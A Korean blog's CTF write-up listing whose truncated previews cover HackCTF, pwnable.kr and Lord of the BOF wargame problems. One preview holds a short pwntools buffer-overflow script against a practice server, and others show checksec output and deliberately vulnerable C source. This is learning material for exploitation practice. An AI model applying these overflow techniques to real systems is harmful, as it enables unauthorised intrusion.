본문 바로가기

CTF_Write_UP

(91)
[HackCTF] RTL_World 시작 안녕하세요 :D 이 사이트 참 좋은 것 같습니다 ㅎㅎ 힐링하는 느낌 들고 좋네요. 바로 이어서 첫 200점짜리 문제, RTL World 풀어볼게요!! Write UP root@goorm:/workspace/LCH_Server/HackCTF/11.RTL_world# ./rtl_world 세그멘테이션 오류 (core dumped) ??? nc로 붙여볼게요. NPC [Village Presient] : Binary Boss made our village fall into disuse... If you Have System Armor && Shell Sword. You can kill the Binary Boss... Help me Pwnable Hero... :( Your Gold : 1000 =====..
[HackCTF] Yes or no 시작 안녕하세요 :D 어제 쓰다 말았던 HackCTF Write up이에요. 150점 짜리 문제 중 마지막 10번 문제, Yes or no!! 시작해봐요. Write UP root@goorm:/workspace/LCH_Server/HackCTF/10.Yes_or_No# ./yes_or_no Show me your number~! 0 Sorry. You can't come with us 숫자 하나를 달라고 해서 주니깐 함께 갈 수 없다며 매정하게 종료하네요. gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : disabled RELRO : Partial NX만 켜져있습니다. 쉘코드는 못쓰겠네요. gdb-peda$ pd mai..
[HackCTF] 1 ~ 9번 문제 시작 안녕하세요 :D 포너블 공부하다가 좋은 사이트 찾아서!! 문제를 풀고 있어요. 처음엔 아주 기초적인 문제라 빠르게 빠르게 넘어갔습니다 ㅎㅎ Write UP도 설명없이 적도록 할게요 시작해보죠!! (HackCTF : https://ctf.j0n9hyun.xyz/) Write UP 1. Basic_BOF #1 from pwn import * #p = process("./bof_basic") p = remote("ctf.j0n9hyun.xyz", 3000) key = 0xdeadbeef payload = "" payload += "A" * 40 payload += p32(key) p.sendline(payload) p.interactive() 키값 바꾸는 문제!! pwnable.kr에서 많이 본 친구였습..
[pwnable.kr] asm 시작 안녕하세요!! :D 즐거운 추석 연휴에요 LOB 다 풀고 복귀하려 했지만 바깥 세상엔 재밌는게 너무 많아서.. 다음 휴가 때 마무리하려구요ㅎㅎ.. 밤에 심심해서 pwnable,kr 문제를 풀어봤습니다!! 토들러 난이도도 거의 끝나가네요ㅠㅠ 제 군생활은 토들러와 함께 보냈습니다. 쉘코드 만드는 문제, asm!! 시작해봐요 Write UP asm@prowl:~$ ls -l total 28 -rwxr-xr-x 1 root root 13704 Nov 29 2016 asm -rw-r--r-- 1 root root 1793 Nov 29 2016 asm.c -rw-r--r-- 1 root root 211 Nov 19 2016 readme -rw-r--r-- 1 root root 67 Nov 19 2016 thi..
[LOB] succubus 시작 안녕하세요!! LOB도 끝이 보입니다 ㅎㅎㅎ.. 길었네요 뒤로 갈 수록 파일 이름이나 라이브러리로 장난 안 치는 것 같아서 좋네요 ㅋㅋㅋㅋㅋㅋ 시작해보죠 :D Write UP /* The Lord of the BOF : The Fellowship of the BOF - nightmare - PLT */ #include #include #include #include main(int argc, char *argv[]) { char buffer[40]; char *addr; if(argc < 2){ printf("argv error\n"); exit(0); } // check address addr = (char *)&strcpy; if(memcmp(argv[1]+44, &addr, 4) != 0){ ..
[LOB] zombie_assassin 시작 안녕하세요!! :D 어제 14회 정보보안 산업기사 필기 시험을 봤습니다 ㅋㅋㅋㅋㅋㅋ 역대급 난이도였다던데.. 저도 간당간당 할 것 같네요 ㅠㅠ 자자 휴가 나왔을 때만 풀 수 있는 전설의 문제.. LOB.. 이번에 끝장을 봐야겠어요 ㅎㅎ 시작해보죠!! Write UP /* The Lord of the BOF : The Fellowship of the BOF - succubus - calling functions continuously */ #include #include #include // the inspector int check = 0; void MO(char *cmd) { if(check != 4) exit(0); printf("welcome to the MO!\n"); // olleh! sy..
[pwnable.kr] unlink 시작 안녕하세요!! :D 정보보안산업기사 필기가 1주일밖에 남지 않았지만.. 포너블은 쉬면 금방 까먹잖아요?? ㅎㅎ 무슨 문젤 풀까 고민하다가 오랜만에 pwnable.kr 들어가보니 딱!! unlink가 있었습니다. 안 그래도 heap 영역 공부하다가 끊긴 느낌이라 찝찝했는데 이 친구 풀면서 정리하려고 해요. 시작해보죠!! Write UP 바이너리를 실행해봐요. root@goorm:/workspace/LCH_Server/pwnable.kr/pwnable_unlink# ./unlink here is stack address leak: 0xfffa8e54 here is heap address leak: 0x93f2410 now that you have leaks, get shell! aaaa 스택이랑 힙 주..
HackCon CTF pwn binary babybof babypwn Not so easy BOF